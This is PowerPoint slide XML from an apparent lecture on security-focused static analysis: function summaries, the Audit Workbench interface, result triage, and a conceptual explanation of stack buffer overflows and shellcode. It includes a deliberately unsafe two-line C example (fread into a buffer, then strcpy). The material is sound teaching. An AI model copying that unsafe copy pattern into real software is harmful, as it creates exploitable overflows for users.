              <a:t>all problems will evidence themselves if the program is examined one function at a time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This is a particularly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad assumption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>for many security problems, especially those related to input validation and representation, because identifying these problems often requires looking across function boundaries.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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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Global Analysis (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Accurately identifying this buffer overflow vulnerability requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>looking across function boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="2924943"/>
            <a:ext cx="5328592" cy="26044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Global Analysis (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Function summaries for C function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>()</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16386" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827583" y="2276872"/>
            <a:ext cx="7170435" cy="2088232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="2780928"/>
            <a:ext cx="351378" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Λ</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="物件 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1331640" y="3573016"/>
          <a:ext cx="1217662" cy="448940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s16388" name="Equation" r:id="rId4" imgW="419040" imgH="177480" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId4" imgW="41904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573016"/>
                        <a:ext cx="1217662" cy="448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Global Analysis (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="2170584" cy="4873752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Pseudocode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> for a global analysis algorithm using function summaries</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2915816" y="1412776"/>
            <a:ext cx="4676775" cy="828675"/>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2843808" y="2276872"/>
            <a:ext cx="4914900" cy="42862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Reporting Result (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The Audit Workbench interface</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187624" y="2060848"/>
            <a:ext cx="6480720" cy="4532684"/>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Reporting Result (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Auditors need at least three features for managing tool output: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Grouping and sorting results </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Eliminating unwanted results </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Explaining the significance of results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Building a Model</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In fact, many static analysis techniques were developed by researchers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>working on compilers and compiler optimization problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Lexical Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Parsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Semantic Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>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Grouping and Sorting Results (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Because static analysis tools can generate a large number of results, users appreciate having results presented in a ranked order so that the most important results will most likely appear early in the review.</a:t>
            </a:r>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1475656" y="3501008"/>
            <a:ext cx="4949320" cy="316835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Grouping and Sorting Results (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sorting and searching results in Audit Workbench</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1475656" y="2492896"/>
            <a:ext cx="5394762" cy="396044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Eliminating Unwanted Results</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Reviewing unwanted results is no fun, but reviewing the same unwanted results more than once is maddening. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>All advanced static analysis tools provide mechanisms for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suppressing results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>so that they will not be reported in subsequent analysis runs.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Explaining the Significance of the Results (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Good bug reports from human testers include a description of the problem, an explanation of who the problem affects or why it is important, and the steps necessary to reproduce the problem.</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="3356992"/>
            <a:ext cx="6276697" cy="28083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Explaining the Significance of the Results (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Audit Workbench makes its case in two ways. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>First, if the result is based on tracking tainted data through the program, it presents a dataflow trace that gives the path through the program that an exploit could take. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Second, it provides a textual description of the problem in both a short form and a detailed form.</a:t>
            </a:r>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Explaining the Significance of the Results (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="7467600" cy="4637112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The detailed explanation is divided into five parts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The abstract, a one sentence explanation of the problem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A description that explains the specific issue in detail and references the specifics of the issue at hand (with code examples) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Recommendations for how the issue should be fixed (with a different recommendation given depending on the specifics of the issue at hand) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Auditing tips that explain what a reviewer should do to verify that there is indeed a problem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References that give motivated reviewers a place to go to read more if they are so inclined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>    For these two lines of code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>           36 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>), FILE); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>           37 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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(1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When the return address is overwritten as the result of a software flaw, it seldom points to valid instructions. Consequently, transferring control to this address typically causes an exception and results in a corrupted stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It is possible for an attacker to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a specially crafted string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>that contains a pointer to some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, which the attacker also provides.</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36</a:t>
            </a:fld>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(2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When the subroutine returns, control is then transferred to this code. The malicious code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runs with the permissions that the vulnerable program has when the subroutine returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. This is why programs running with root or other elevated privileges are normally targeted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The malicious code can perform any function that can otherwise be programmed, but often will simply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open a remote shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>on the compromised machine. For this reason the injected, malicious code is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</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(3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A malicious argument must have several characteristics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It must be accepted by the vulnerable program as legitimate input. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The argument, along with other controllable inputs, must result in execution of the vulnerable code path. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The argument must not cause the program to terminate abnormally before control is passed to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>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(4)</a:t>
